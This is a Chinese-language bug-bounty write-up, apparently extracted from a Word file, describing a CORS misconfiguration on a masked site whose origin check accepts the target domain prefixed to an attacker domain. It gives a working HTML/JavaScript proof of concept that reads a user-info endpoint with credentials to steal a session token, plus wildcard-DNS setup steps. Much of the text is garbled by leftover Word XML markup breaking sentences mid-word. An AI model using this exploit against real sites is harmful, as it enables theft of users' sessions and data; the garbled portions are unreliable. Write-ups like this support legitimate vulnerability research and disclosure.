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CORS 跨域资源共享，就是可以让不同网站和不同服务器直接通信。一篇CORS完整指南，总结的很详细，包括如何绕过等等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https://xz.aliyun.com/t/2745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某团的给的一个中危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挖洞过程无意中看到一个数据包，响应包中包含有Access-Control-Allow-Origin这个字</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/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段，然后就随手尝试看看有没有CORS漏洞！结果如图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single" w:color="FFFFFF" w:sz="36" w:space="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0668000" cy="80200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再尝试 发现  如下图！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single" w:color="FFFFFF" w:sz="36" w:space="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068050" cy="8020050"/>
            <wp:effectExtent l="0" t="0" r="0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发现后面再加上域名是可以跨域获取资源的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如何利用？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利用方式就是泛解析，将http://m.****.com.rcoil.me解析到我们的IP上，由于比较穷买不起域名，就本地搭了个DNS设置了泛解析，如下图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single" w:color="FFFFFF" w:sz="36" w:space="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820275" cy="3867150"/>
            <wp:effectExtent l="0" t="0" r="9525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02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只要是*.rcoil.me都会解析到我们的本地这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single" w:color="FFFFFF" w:sz="36" w:space="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220700" cy="5791200"/>
            <wp:effectExtent l="0" t="0" r="0" b="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POC如下：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&lt;!DOCTYPE html&gt;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&lt;html&gt;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&lt;body&gt;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&lt;center&gt;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&lt;h2&gt;CORS POC Exploit&lt;/h2&gt;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&lt;h3&gt;Extract SID&lt;/h3&gt;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&lt;div id="demo"&gt;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&lt;button type="button" onclick="cors()"&gt;Exploit&lt;/button&gt;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&lt;/div&gt;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&lt;script&gt;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function cors() {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  var xhttp = new XMLHttpRequest();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  xhttp.onreadystatechange = function() {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    if (this.readyState == 4 &amp;&amp; this.status == 200) {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      document.getElementById("demo").innerHTML = alert(this.responseText);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    }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  };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  xhttp.open("GET", "http://m.***.com/activity/juejiapi/editor/userinfo", true);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  xhttp.withCredentials = true;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  xhttp.send();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}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&lt;/script&gt;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&lt;/body&gt;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微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:b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&lt;/html&gt;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而拿到的TOKEN又能干嘛呢，如图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602" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:right="0"/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C7C7C7"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="FFFFFF" w:sz="36" w:space="0"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="9829800" cy="7591425"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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526" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:right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 w:themeColor="text1"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>美滋滋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C7C7C7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7F7F7F"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18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F7F7F"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://creativecommons.org/licenses/by-sa/2.5/deed.zh" \o "署名-相同方式共享" \t "http://gxgoodboy.lofter.com/post/_blank"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F7F7F"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="7F7F7F"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t> 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7F7F7F"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end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C5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qzuser</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-02-22T11:59:54Z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